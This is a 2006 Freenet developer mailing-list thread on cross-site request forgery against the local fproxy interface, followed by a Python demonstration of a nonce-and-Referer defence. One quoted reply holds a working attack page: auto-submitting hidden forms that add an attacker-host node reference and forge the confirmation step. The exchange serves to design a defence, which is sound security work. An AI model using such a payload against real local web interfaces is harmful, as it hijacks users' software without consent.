On Fri, Jun 02, 2006 at 01:41:55PM +0100, Michael Rogers wrote:
> Matthew Toseland wrote:
> >So not only can it not read a frame from a different domain, it can't
> >open one in a hidden iframe and then submit it either?
>
> The script doesn't need to submit the same confirmation returned by the
> server - it can just fake it like it did with the original form.
Well, yes, but if it can't do that, could it open the page in a subframe
and then submit that?
>
> Something like this:
>
> ...
> <script type='text/javascript'>
> function submitFirst() {
> document.forms['form'].submit();
> window.setTimeout ('submitSecond()', 2000);
> }
> function submitSecond() {
> document.forms['confirmation'].submit();
> }
> </script>
> </head>
> <body onload='submitFirst()'>
> <form name='form' action='http://localhost:8888/darknet/' method='post'
> enctype='multipart/form-data' target='hidden_iframe'>
> <input name='url' type='hidden' value='http://mallory.net/ref.txt' />
> <input name='connect' type='hidden' value='Connect' />
> </form>
> <form name='confirmation' action='http://localhost:8888/confirm/'
> method='post' enctype='multipart/form-data' target='hidden_iframe'>
> <input name='areYouSure' type='hidden' value='Yes' />
> </form>
> ...
>
> As far as I can see, the only way to prevent this is to put a nonce in a
> hidden field in the form. If the nonce doesn't match when the form is
> submitted, ignore the request and maybe alert the user.
Right. So we reconfirm dangerous operations (especially if the referer
is set to somewhere outside fproxy), with a hidden field. Will implement
that soon.
>
> Cheers,
> Michael
> _______________________________________________
> Devl mailing list
> [email protected]
> http://emu.freenetproject.org/cgi-bin/mailman/listinfo/devl
>
--
Matthew J Toseland - [EMAIL PROTECTED]
Freenet Project Official Codemonkey - http://freenetproject.org/
ICTHUS - Nothing is impossible. Our Boss says so.
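The thread settles on a nonce in a hidden form field, with a re-confirmation step when the Referer points outside fproxy. The following is an added illustration of that server-side check, not code from the Freenet project or from either poster; the session identifier, the `nonce` field name, the trusted origin and the outcome labels are all constructed for the demo. It shows why the cross-site form in Michael's example fails: the attacking page can auto-submit a POST but cannot read the page that carries the nonce, so its submission arrives without a valid one.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Origin of the local web interface; constructed value for this demo.
TRUSTED_ORIGIN = "http://localhost:8888"


@dataclass
class SessionState:
    """Per-browser-session state: the nonces that are still valid."""
    pending_nonces: set = field(default_factory=set)


class CsrfGuard:
    """Issue per-form nonces and verify them on submission.

    The nonce lives server-side, keyed by session, and is written into a
    hidden field of the form.  A page on another origin can make the
    browser submit our form, but it cannot read our responses, so it
    never learns the nonce and its forged submission is rejected.
    """

    def __init__(self):
        self._sessions = {}

    def _session(self, session_id):
        return self._sessions.setdefault(session_id, SessionState())

    def issue_nonce(self, session_id):
        """Create a fresh, single-use nonce for one rendering of a form."""
        nonce = secrets.token_hex(16)
        self._session(session_id).pending_nonces.add(nonce)
        return nonce

    def hidden_field(self, session_id):
        """HTML fragment to embed in the form being protected."""
        return f"<input name='nonce' type='hidden' value='{self.issue_nonce(session_id)}' />"

    def verify(self, session_id, submitted_nonce, referer=None):
        """Return 'accept', 'reject' or 'reconfirm'.

        - missing or unknown nonce            -> reject (the forged cross-site case)
        - valid nonce, Referer from elsewhere -> reconfirm (ask the user again)
        - valid nonce, local or no Referer    -> accept
        A nonce is consumed on first use, so a captured one cannot be replayed.
        """
        state = self._session(session_id)
        match = None
        for candidate in state.pending_nonces:
            # Constant-time comparison; an empty string never matches a real nonce.
            if hmac.compare_digest(candidate, submitted_nonce or ""):
                match = candidate
        if match is None:
            return "reject"
        state.pending_nonces.discard(match)
        if referer and not _same_origin(referer, TRUSTED_ORIGIN):
            return "reconfirm"
        return "accept"


def _same_origin(url, origin):
    """True when scheme and host:port of url match those of origin."""
    a, b = urlsplit(url), urlsplit(origin)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)


def demo():
    """Walk through the forged, legitimate, replayed and suspicious submissions."""
    guard = CsrfGuard()
    session = "cookie-abc123"  # constructed session identifier

    # 1. A third-party page auto-submits the form; it never saw our page, so no nonce.
    forged = guard.verify(session, None, referer="http://mallory.net/page.html")

    # 2. The user loads the real form; the nonce is embedded and remembered.
    nonce = guard.issue_nonce(session)
    legit = guard.verify(session, nonce, referer="http://localhost:8888/darknet/")

    # 3. Submitting the same nonce again fails because it was consumed.
    replay = guard.verify(session, nonce, referer="http://localhost:8888/darknet/")

    # 4. A valid nonce arriving with an outside Referer triggers re-confirmation.
    nonce2 = guard.issue_nonce(session)
    suspicious = guard.verify(session, nonce2, referer="http://mallory.net/page.html")

    return forged, legit, replay, suspicious


if __name__ == "__main__":
    print(demo())
```

The nonce must be unguessable (here 128 bits from `secrets`) and compared in constant time; tying it to the session and consuming it on use keeps a leaked token from being reused. The Referer check is treated as a secondary signal only, since browsers and proxies may strip the header.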